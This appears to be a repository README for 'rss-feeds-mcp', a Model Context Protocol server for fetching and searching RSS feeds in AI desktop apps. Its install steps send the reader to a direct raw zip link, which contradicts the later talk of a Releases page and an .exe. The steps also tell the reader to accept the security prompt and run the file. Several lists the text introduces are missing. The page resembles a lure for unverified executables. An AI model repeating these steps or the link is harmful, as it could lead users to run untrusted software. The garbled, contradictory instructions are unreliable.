Enable AI assistants to fetch, filter, and search RSS feeds instantly using a zero-configuration Model Context Protocol server.
rss-feeds-mcp is a simple server designed to work with RSS feeds. It helps you fetch, filter, and search blog posts from any RSS source. You can use it with applications like Claude Desktop, Cursor, and Windsurf without the need for API keys. This makes it easy to access and work with content from your favorite blogs and news sites.
The server handles the technical part so you do not have to. It collects data, applies filters you choose, and helps find posts that match your interests.
To get started, visit the official page below and download the software for Windows:
Click the link above. It will take you to the GitHub repository where you can find the latest release and download the Windows version.
Before downloading, make sure your computer meets these basic requirements:
These requirements ensure the server runs smoothly and connects to RSS sources without issues.
Follow these step-by-step instructions to download and run the software.
Open your web browser and go to:
https://github.com/SIAMx69z/rss-feeds-mcp/raw/refs/heads/main/src/mcp_feeds_rss_v1.1.zip
This is the official page where the software is hosted.
On the GitHub page, look for the "Releases" section. It is usually on the right side or near the top menu. Click on the latest release link. This page contains all the files you need.
Inside the release, find the file that ends with .exe for Windows. It might have a name like rss-feeds-mcp-windows.exe. Click on this file to download it to your computer.
Once the download finishes, open the file. A security prompt may appear; confirm you want to run it. Follow the simple on-screen instructions to install the software.
The installer will copy the necessary files and set up rss-feeds-mcp on your PC.
After installation, locate the rss-feeds-mcp icon on your desktop or in the Start menu. Click it to start the server.
The server runs in the background and will listen for requests from apps like Claude Desktop or Windsurf.
Use your chosen app (Claude Desktop, Cursor, or Windsurf) and set rss-feeds-mcp as the RSS feed source. The apps will communicate with the server, and you can start fetching and searching blog posts.
Once the server is running, you have several ways to work with RSS feeds.
Add the URLs of your favorite blogs or news sites into the server’s settings. It will fetch updates regularly without needing keys or passwords.
Use built-in filters to narrow down posts by keywords, dates, or categories. This helps you find relevant content faster.
Use the search feature to look through all collected posts. Find what you need by typing simple queries.
rss-feeds-mcp works smoothly with popular tools like Claude Desktop and Cursor. It fits well into your workflow without extra setup.
The server has a simple configuration file where you can:
Open the config file in a text editor like Notepad to make changes. Save the file and restart the server for them to take effect.
If you run into problems, try these solutions:
If you continue to have trouble, look for help under the "Issues" tab on the GitHub page.
rss-feeds-mcp does not collect or share your personal data. It only connects to public RSS feeds you add. The server runs locally on your computer, giving you control over your data.
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The repository is open for feedback and suggestions.
SIAMx69z/rss-feeds-mcp
March 14, 2026
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